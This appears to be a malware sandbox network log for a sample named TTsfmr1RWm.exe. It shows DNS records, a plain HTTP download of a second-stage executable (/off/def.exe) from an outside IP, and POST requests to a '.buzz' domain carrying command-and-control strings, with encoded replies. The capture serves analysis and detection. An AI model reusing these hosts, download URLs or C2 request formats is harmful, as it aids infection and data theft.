Dec 26, 2024 12:42:00.290903091 CET	1.1.1.1	192.168.2.6	0x1659	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:00.290903091 CET	1.1.1.1	192.168.2.6	0x1659	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:00.290903091 CET	1.1.1.1	192.168.2.6	0x1659	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:00.290919065 CET	1.1.1.1	192.168.2.6	0x63e	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:00.290919065 CET	1.1.1.1	192.168.2.6	0x63e	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:07.675487995 CET	1.1.1.1	192.168.2.6	0x7a6d	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:07.676091909 CET	1.1.1.1	192.168.2.6	0x628b	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:12.259104967 CET	1.1.1.1	192.168.2.6	0xba7	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:12.353714943 CET	1.1.1.1	192.168.2.6	0x7c42	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:19.855880976 CET	1.1.1.1	192.168.2.6	0x3083	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:19.856703997 CET	1.1.1.1	192.168.2.6	0x8dca	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

mindhandru.buzz

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49784	185.215.113.16	80	6844	C:\Users\user\Desktop\TTsfmr1RWm.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 12:41:38.770641088 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 26, 2024 12:41:40.193350077 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Dec 2024 11:41:39 GMT Content-Type: application/octet-stream Content-Length: 2801664 Last-Modified: Thu, 26 Dec 2024 11:19:36 GMT Connection: keep-alive ETag: "676d3bc8-2ac000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 c5 4d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+M+`Ui`D @ @ @.rsrcD``@.idata f@gtwxvlel@2h@vnlbxhun *@.taggant@+"@
Dec 26, 2024 12:41:40.193455935 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:40.193470001 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:40.193483114 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:40.193515062 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:40.193527937 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:40.193542004 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:40.193766117 CET	1236	IN	Data Raw: 5d 75 4f 20 49 53 6c 40 19 54 46 20 71 63 46 20 53 75 4a 20 49 53 6c 26 71 51 46 20 4f 73 70 20 49 60 76 23 49 b2 46 20 49 50 46 20 5a 75 5d 20 49 57 c4 34 49 4d 50 2a 54 63 52 4b 90 54 4e ba 56 56 b5 38 49 4d 50 92 6c 4d 46 90 71 66 46 20 53 79 Data Ascii: ]uO ISl@TF qcF SuJ ISl&qQF Osp I`v#IF IPF Zu] IW4IMPTcRKTNVV8IMPlMFqfF Sys)gF SmT KMX qPF OzGJOuK ISlHUMF&R` IWn$IMLFQd,QT{MHMMF&owF I`v#IF IPF Zu] IW4IMPTcRKTNVV8IMPJMFqfF Syn)gF SmT KMX qPF OzGJOuK ISl)gF SuJ ISl(`R
Dec 26, 2024 12:41:40.193836927 CET	1236	IN	Data Raw: 51 53 46 5c 4f 33 50 26 49 3e 4e 0e 52 53 46 ae 53 3b 4f 26 49 b2 4c 0e 52 53 46 ea 53 3b 4f 26 49 9a 4f 12 54 57 46 a6 53 01 50 26 49 63 51 2a 49 53 46 15 52 3b 4f 26 49 ae 4d 0e 52 53 46 0c 4f 3b 4f 26 49 fa 4f 0e 52 53 46 68 4d 86 4e 26 49 b1 Data Ascii: QSF\O3P&I>NRSFS;O&ILRSFS;O&IOTWFSP&IcQISFR;O&IMRSFO;O&IORSFhMN&INRSFBTWF&INISFMWF&IMKRMF IgF IMF!INF J]FJOPeINF!IMG0IMSF!IOF I]FQkNqIOF#IPG IN IF'IaF#JMFOMFIZF4IPG I-L IF3IaF#JMFSMFIgF4IPG IH IFBIaF#JMFhKMF
Dec 26, 2024 12:41:40.193850040 CET	1236	IN	Data Raw: 49 c6 46 c7 52 5d 46 a1 49 f4 4f 26 49 e6 46 c7 52 67 46 e9 49 f4 4f 26 49 d6 46 c7 52 53 46 c9 49 f4 4f 21 49 26 47 51 52 76 46 f9 49 78 51 4c 49 2e 47 56 52 7f 46 d1 49 71 50 61 49 fe 46 b4 4e 94 46 09 4a 78 51 6b 49 fe 46 2c 4e 9e 46 11 4a 1e Data Ascii: IFR]FIO&IFRgFIO&IFRSFIO!I&GQRvFIxQLI.GVRFIqPaIFNFJxQkIF,NFJLIG+TFIKQIG$QFIHNIVG5OSFIO&IVF(IF)IYFIVF0IF)IaFIVF8IF)ImFIVFDIF)IuFIVFLIF)I}FIVFXIF)IFIVF`IF)IFIVFhIF)IFIVFtIF)IFIVF\|IG)IFIVF
Dec 26, 2024 12:41:40.313088894 CET	1236	IN	Data Raw: 96 9c 8a 69 8f a6 a5 62 98 9c 9a 7f 8c 9c 94 66 92 94 46 73 8e 9f 9c 69 8c 92 a5 71 9e 92 98 79 a8 90 95 6e 8f 96 8d 20 9c 90 a5 6d 8a 9b 87 67 8e 9f a5 6c 98 90 91 20 9c 92 98 76 92 90 8b 7f 8e 9f 98 6f 9b ac 89 72 92 a1 8f 63 8a 99 46 73 8e 9f Data Ascii: ibfFsiqyn mgl vorcFsierr vrfdnlIrenlIuwMectFsikerrIrelymi veFsia

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49712	20.198.119.84	443

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:09 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 73 4d 75 6f 72 58 64 31 6b 6d 50 77 61 64 49 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 38 30 39 32 36 32 38 34 38 62 31 66 61 39 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: ssMuorXd1kmPwadI.1Context: b809262848b1fa91
2024-12-26 11:41:09 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-26 11:41:09 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 73 73 4d 75 6f 72 58 64 31 6b 6d 50 77 61 64 49 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 38 30 39 32 36 32 38 34 38 62 31 66 61 39 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 46 55 57 56 70 7a 72 4f 35 39 6c 55 66 64 71 50 31 70 6f 6d 34 50 6a 38 37 44 61 47 49 6a 49 53 62 4e 68 46 6a 6a 76 41 31 6b 70 5a 4c 45 52 71 77 50 46 36 56 31 58 65 55 30 6f 5a 78 79 37 66 34 32 68 2f 35 69 59 38 79 70 42 38 44 37 64 75 2f 55 64 36 48 30 69 37 67 49 6a 34 55 77 59 72 6d 61 52 6b 46 2f 65 70 43 38 52 78 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ssMuorXd1kmPwadI.2Context: b809262848b1fa91<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVFUWVpzrO59lUfdqP1pom4Pj87DaGIjISbNhFjjvA1kpZLERqwPF6V1XeU0oZxy7f42h/5iY8ypB8D7du/Ud6H0i7gIj4UwYrmaRkF/epC8Rx
2024-12-26 11:41:09 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 73 73 4d 75 6f 72 58 64 31 6b 6d 50 77 61 64 49 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 38 30 39 32 36 32 38 34 38 62 31 66 61 39 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: ssMuorXd1kmPwadI.3Context: b809262848b1fa91<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-26 11:41:09 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-26 11:41:09 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 7a 68 77 31 68 79 4f 4b 62 6b 69 74 55 63 64 47 6e 70 76 56 74 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: zhw1hyOKbkitUcdGnpvVtw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49724	104.21.11.101	443	6844	C:\Users\user\Desktop\TTsfmr1RWm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:16 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mindhandru.buzz
2024-12-26 11:41:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-26 11:41:17 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dhnb5jnbhk1rftd75kmdotc7m4; expires=Mon, 21 Apr 2025 05:27:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jUMLaKQ%2B96WpV6PtMA%2F%2FZ3LrXuA1nj%2BeoMRsq0UAFircUoeYeMTpCj8C1eGzml9YjJvlzAYxSdC4XkrrfjnNyk3gy%2BohKZ9QI9k5fYnjfiQLbmUS5rKqz90Bqi9u8vFiI3I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd055f3b4328-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1557&rtt_var=611&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1751649&cwnd=220&unsent_bytes=0&cid=24047785135a5028&ts=776&x=0"
2024-12-26 11:41:17 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-26 11:41:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49725	104.21.11.101	443	6844	C:\Users\user\Desktop\TTsfmr1RWm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:18 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: mindhandru.buzz
2024-12-26 11:41:18 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-26 11:41:19 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e44rm77rsukj037cse58ps5kf3; expires=Mon, 21 Apr 2025 05:27:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pTluskgG7smu%2FlAtJ4PAFZaQXCzFj4YgADmqMRF5OlDvw7PP6kooIMttOPG%2FTlHHYBc%2FBi7zbyJM7h3sakPwiJP%2BI4MIuM5fg45aVgZuIkHwLWy9prSr0n4GG2TYgJw3lNw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd12ce2cc346-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1502&rtt_var=572&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=952&delivery_rate=1899804&cwnd=181&unsent_bytes=0&cid=f94d0ad5248935ac&ts=802&x=0"
2024-12-26 11:41:19 UTC	244	IN	Data Raw: 31 63 62 37 0d 0a 64 4d 30 5a 4a 65 70 75 67 4b 70 58 6d 64 59 50 53 4d 68 4e 66 44 49 52 64 78 6d 6f 47 65 55 35 76 4e 57 74 58 61 38 75 78 4c 34 50 37 32 38 48 30 46 71 73 69 43 54 38 39 44 55 38 75 6a 67 5a 48 6a 4d 57 66 59 6f 6a 67 31 6a 51 70 73 68 78 6a 56 69 70 6e 45 36 72 65 45 6d 5a 43 36 79 49 4d 75 48 30 4e 52 4f 7a 62 78 6c 63 4d 30 30 37 7a 58 4f 48 57 4e 43 33 7a 44 62 41 58 71 6a 64 48 4b 46 2b 54 59 38 4e 35 4d 73 37 39 4c 4e 71 4c 61 6b 6e 45 6c 74 38 48 33 53 4b 4e 63 64 63 78 76 65 58 66 2b 4a 4c 73 4e 38 35 72 47 70 4f 79 42 4f 73 30 58 58 38 75 43 31 79 36 69 77 5a 55 48 30 52 66 63 4e 78 6a 56 48 59 74 73 6b 33 33 30 65 69 31 68 79 76 66 55 79 46 42 50 44 47 4d 66 4f 34 62 43 65 70 62 31 41 51 64 41 Data Ascii: 1cb7dM0ZJepugKpXmdYPSMhNfDIRdxmoGeU5vNWtXa8uxL4P728H0FqsiCT89DU8ujgZHjMWfYojg1jQpshxjVipnE6reEmZC6yIMuH0NROzbxlcM007zXOHWNC3zDbAXqjdHKF+TY8N5Ms79LNqLaknElt8H3SKNcdcxveXf+JLsN85rGpOyBOs0XX8uC1y6iwZUH0RfcNxjVHYtsk330ei1hyvfUyFBPDGMfO4bCepb1AQdA
2024-12-26 11:41:19 UTC	1369	IN	Data Raw: 30 37 6b 6a 76 55 61 64 32 6d 33 69 72 41 58 4b 43 63 43 65 46 69 42 34 38 41 6f 70 42 31 38 37 68 6a 4c 36 6b 67 47 56 46 7a 42 33 54 4b 65 49 39 54 32 72 33 41 4d 4d 4a 43 72 4e 73 65 70 6e 78 49 6a 77 54 6b 78 7a 61 37 2b 69 30 74 73 6d 39 47 45 46 4d 46 65 4d 6c 76 69 6b 71 65 71 49 45 6d 6a 55 75 71 6e 45 37 76 66 55 6d 4a 41 65 4c 61 50 66 43 2f 61 44 69 68 4a 68 4e 64 63 78 68 78 78 58 69 48 58 4e 53 39 77 44 58 4a 51 61 76 61 46 71 38 37 43 63 67 4c 2b 6f 68 74 75 35 64 6f 4f 71 30 6a 43 42 4a 4a 56 57 53 45 59 73 64 63 30 76 65 58 66 38 56 4a 70 64 38 64 6f 48 68 50 67 78 37 69 32 6a 50 32 73 58 38 73 72 79 45 55 55 32 45 66 64 63 78 34 6a 6c 44 58 73 73 67 37 6a 51 4c 6d 32 77 37 76 49 77 65 70 41 65 6e 45 50 2b 79 30 4c 54 58 6b 4e 6c 35 58 66 Data Ascii: 07kjvUad2m3irAXKCcCeFiB48AopB187hjL6kgGVFzB3TKeI9T2r3AMMJCrNsepnxIjwTkxza7+i0tsm9GEFMFeMlvikqeqIEmjUuqnE7vfUmJAeLaPfC/aDihJhNdcxhxxXiHXNS9wDXJQavaFq87CcgL+ohtu5doOq0jCBJJVWSEYsdc0veXf8VJpd8doHhPgx7i2jP2sX8sryEUU2Efdcx4jlDXssg7jQLm2w7vIwepAenEP+y0LTXkNl5Xf
2024-12-26 11:41:19 UTC	1369	IN	Data Raw: 30 69 6c 65 65 2b 59 38 34 31 51 7a 2b 6e 44 79 73 62 30 53 43 54 74 66 4c 4f 2f 57 7a 65 32 71 31 59 51 63 51 64 42 6b 37 6b 6a 75 4b 57 74 61 78 33 54 44 41 54 36 6a 53 47 61 70 30 54 34 67 4d 37 38 30 78 38 4c 39 75 4a 36 34 39 46 46 42 37 45 48 72 41 63 63 63 56 6e 72 44 58 66 35 55 4d 6c 38 73 64 37 55 35 45 68 67 4c 6c 33 6e 58 6b 2b 6e 52 71 72 53 4e 65 43 44 4d 59 63 38 39 2b 69 46 72 55 75 63 6f 31 77 55 53 6f 33 77 53 67 66 30 65 45 42 4f 6a 46 4f 2f 2b 38 5a 43 47 68 4b 52 35 52 65 56 55 31 69 6e 79 66 47 34 62 33 2b 7a 6a 42 51 61 6d 65 49 36 78 31 53 59 38 61 6f 74 64 37 34 76 52 71 4a 75 70 33 58 6c 78 36 46 58 44 41 66 34 64 63 30 37 4c 4d 4f 4d 35 42 6f 64 59 59 71 48 39 4c 67 51 48 6b 79 44 4c 2f 73 58 38 76 6f 79 4d 53 45 44 31 56 66 4e Data Ascii: 0ilee+Y841Qz+nDysb0SCTtfLO/Wze2q1YQcQdBk7kjuKWtax3TDAT6jSGap0T4gM780x8L9uJ649FFB7EHrAcccVnrDXf5UMl8sd7U5EhgLl3nXk+nRqrSNeCDMYc89+iFrUuco1wUSo3wSgf0eEBOjFO/+8ZCGhKR5ReVU1inyfG4b3+zjBQameI6x1SY8aotd74vRqJup3Xlx6FXDAf4dc07LMOM5BodYYqH9LgQHkyDL/sX8voyMSED1VfN
2024-12-26 11:41:19 UTC	1369	IN	Data Raw: 6e 72 44 44 66 35 55 4d 72 39 55 45 6f 58 56 4f 68 51 72 71 7a 7a 76 32 76 32 73 68 72 53 67 59 58 58 73 59 66 73 6c 36 67 31 48 4d 74 4d 51 31 77 45 62 6d 6b 6c 61 6f 59 77 66 51 54 4d 58 45 48 4f 75 76 66 7a 7a 71 4d 46 42 4a 4d 78 4a 33 69 69 50 48 57 4e 47 2b 77 44 66 46 51 36 6e 59 47 4b 6c 39 53 6f 30 44 36 4e 6f 39 39 62 6c 6d 4a 61 45 39 48 6c 31 33 47 58 2f 43 63 49 30 62 6b 50 66 49 4a 34 30 55 35 75 6b 62 6f 48 74 45 6e 6b 7a 39 68 69 79 37 73 32 46 71 38 6d 38 53 58 6e 4d 61 64 38 5a 77 6a 31 72 53 75 63 67 36 78 45 53 75 7a 68 65 72 63 30 61 47 41 2b 50 4d 4d 50 36 77 61 69 36 73 49 46 34 65 4d 78 4a 6a 69 69 50 48 64 50 6d 43 6a 52 37 33 44 4c 6d 53 44 2b 39 38 53 38 68 55 6f 73 51 32 39 37 78 69 4c 4b 4d 6a 46 46 6c 34 47 58 44 4f 64 34 35 Data Ascii: nrDDf5UMr9UEoXVOhQrqzzv2v2shrSgYXXsYfsl6g1HMtMQ1wEbmklaoYwfQTMXEHOuvfzzqMFBJMxJ3iiPHWNG+wDfFQ6nYGKl9So0D6No99blmJaE9Hl13GX/CcI0bkPfIJ40U5ukboHtEnkz9hiy7s2Fq8m8SXnMad8Zwj1rSucg6xESuzherc0aGA+PMMP6wai6sIF4eMxJjiiPHdPmCjR73DLmSD+98S8hUosQ297xiLKMjFFl4GXDOd45
2024-12-26 11:41:19 UTC	1369	IN	Data Raw: 6a 37 4c 58 71 48 56 42 4b 46 32 53 49 41 45 36 38 6b 78 2f 72 6c 72 4a 71 41 75 47 56 35 39 48 54 75 45 4f 34 42 44 6e 75 2b 50 48 74 31 58 74 4d 6f 62 6a 6e 5a 49 79 42 4f 73 30 58 58 38 75 43 31 79 36 69 59 4d 56 48 34 48 63 73 31 31 69 46 6a 4d 74 73 49 30 33 30 75 70 32 42 47 6a 66 55 69 4f 44 65 66 43 4f 66 79 78 5a 69 57 6d 62 31 41 51 64 41 30 37 6b 6a 75 70 55 4d 32 67 7a 44 48 47 57 72 32 63 43 65 46 69 42 34 38 41 6f 70 42 31 2b 4c 39 6d 4c 71 6f 6a 48 6c 52 2b 46 57 6e 46 66 49 42 53 31 61 58 46 4f 4d 70 48 72 74 63 5a 71 57 6c 4c 68 68 37 6e 32 69 65 37 2b 69 30 74 73 6d 39 47 45 45 55 53 61 39 70 34 78 57 72 49 74 4e 6b 30 77 45 44 6d 77 31 69 32 4f 30 43 45 54 4c 71 49 4d 2f 53 39 62 69 57 72 4a 68 4a 64 64 68 78 2b 79 33 32 44 55 64 53 33 Data Ascii: j7LXqHVBKF2SIAE68kx/rlrJqAuGV59HTuEO4BDnu+PHt1XtMobjnZIyBOs0XX8uC1y6iYMVH4Hcs11iFjMtsI030up2BGjfUiODefCOfyxZiWmb1AQdA07kjupUM2gzDHGWr2cCeFiB48AopB1+L9mLqojHlR+FWnFfIBS1aXFOMpHrtcZqWlLhh7n2ie7+i0tsm9GEEUSa9p4xWrItNk0wEDmw1i2O0CETLqIM/S9biWrJhJddhx+y32DUdS3
